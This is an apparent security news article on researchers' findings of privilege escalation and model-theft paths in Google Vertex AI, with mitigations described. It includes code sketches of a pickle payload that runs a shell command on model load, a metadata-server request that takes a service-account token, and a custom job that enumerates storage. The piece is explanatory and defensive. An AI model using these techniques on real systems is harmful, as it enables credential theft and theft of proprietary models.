How to Steal an AI Model in a Couple of Clicks: Researchers Reveal Vulnerabilities in Google Vertex AI

No one suspected that hacking the popular platform would be so easy.

Palo Alto Networks has discovered two vulnerabilities in Google's Vertex AI platform that could allow attackers to steal valuable machine learning (ML) models and large language models (LLMs) developed in-house: one enables privilege escalation, the other data exfiltration through a malicious model.

The first vulnerability concerned privilege escalation through Custom Jobs in Vertex AI Pipelines. Using these jobs, the researchers were able to reach data they should not have had access to, including cloud storage buckets and BigQuery tables. An attacker could exploit the same path to download sensitive data and models.
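The underlying issue is that a custom job is simply arbitrary code running under whatever service account the pipeline is attached to. A minimal sketch of that idea using the google-cloud-aiplatform SDK is below; the project, bucket, and image names are hypothetical, and this is not the researchers' exact payload:

```python
# Hypothetical sketch: a Vertex AI custom job runs an attacker-chosen
# container command under the project's service account. If that account
# is over-privileged, the command inherits access to storage and BigQuery.
from google.cloud import aiplatform

# Hypothetical project, region, and staging bucket.
aiplatform.init(
    project="victim-project",
    location="us-central1",
    staging_bucket="gs://victim-staging",
)

job = aiplatform.CustomJob(
    display_name="innocuous-looking-job",
    worker_pool_specs=[{
        "machine_spec": {"machine_type": "n1-standard-4"},
        "replica_count": 1,
        "container_spec": {
            # Any image the attacker controls; the command just enumerates
            # what the job's service account can already read.
            "image_uri": "gcr.io/victim-project/attacker-image:latest",
            "command": ["bash", "-c"],
            "args": ["gsutil ls gs://victim-bucket && bq ls --project_id=victim-project"],
        },
    }],
)
job.run()  # executes with the permissions of the attached service account
```

Because the job inherits everything its service account can do, an over-privileged default account turns any job submission into broad data access.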

The second vulnerability turned out to be even more dangerous. The researchers showed that when a malicious model is uploaded from a public repository to the Vertex AI platform, it can access all other models already deployed in the environment. This allows attackers to copy and exfiltrate fine-tuned models and custom LLM adapter layers that may contain unique and sensitive information.
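The report does not publish the exact payload, but one well-known way a model file can execute code the moment it is loaded is Python's pickle deserialization hook. The sketch below illustrates the general technique only, not necessarily the researchers' method:

```python
# Illustration only: pickle-based model formats run code on load via
# __reduce__. Deploying such an artifact means its code executes inside
# the serving environment, with whatever identity that environment holds.
import os
import pickle

class PoisonedModel:
    def __reduce__(self):
        # pickle.load() on the victim side calls this automatically.
        return (os.system, ("echo payload runs inside the model server",))

with open("model.pkl", "wb") as f:
    pickle.dump(PoisonedModel(), f)

# Any consumer that runs pickle.load(open("model.pkl", "rb"))
# triggers the embedded command.
```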

In the course of the study, the researchers created their own malicious model and deployed it in a Vertex AI test environment. From inside it, they were able to obtain the platform's service-account credentials and steal other models, including adapter files used to fine-tune the LLM. These adapters contain the fine-tuned weights that can significantly change the behavior of the underlying model.
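Code running inside a GCP workload can typically obtain an OAuth token for the attached service account from the instance metadata server. A sketch of that documented mechanism follows (again, not necessarily the researchers' exact steps):

```python
# Sketch: from inside a GCP workload, the metadata server hands out an
# OAuth access token for the attached service account. Malicious model
# code could use such a token against the Vertex AI and Storage APIs.
import json
import urllib.request

METADATA_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)

req = urllib.request.Request(METADATA_URL, headers={"Metadata-Flavor": "Google"})
with urllib.request.urlopen(req) as resp:
    token = json.load(resp)["access_token"]

# The token authorizes REST calls such as listing deployed models:
#   GET https://us-central1-aiplatform.googleapis.com/v1/
#       projects/PROJECT/locations/us-central1/models
#   Authorization: Bearer <token>
```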

The study found that deploying even a single unverified model can leak a company's intellectual property and data. To avoid such threats, the researchers recommend isolating test and production environments and strictly controlling who can deploy new models.
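One concrete control along these lines is to run jobs under a dedicated, minimally privileged service account rather than a broad default identity. A sketch, with hypothetical account and project names:

```python
# Sketch: pin custom jobs to a dedicated service account that carries
# only the roles the job truly needs, instead of the default identity.
from google.cloud import aiplatform

aiplatform.init(
    project="prod-project",          # hypothetical
    location="us-central1",
    staging_bucket="gs://prod-staging",
)

job = aiplatform.CustomJob(
    display_name="training-job",
    worker_pool_specs=[{
        "machine_spec": {"machine_type": "n1-standard-4"},
        "replica_count": 1,
        "container_spec": {"image_uri": "gcr.io/prod-project/trainer:latest"},
    }],
)
# service_account caps what any code inside the job can reach.
job.run(service_account="restricted-trainer@prod-project.iam.gserviceaccount.com")
```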

Google responded quickly to the reported vulnerabilities, releasing patches that closed the identified attack paths and making Vertex AI significantly more resistant to unauthorized access and data leakage.

Any unvetted AI model can become a Trojan horse that opens access to a company's entire infrastructure. In an age where data is the main weapon, even a single security lapse can cost millions of dollars. Only strict control and verification of every deployment stage can protect intellectual assets from leaking.
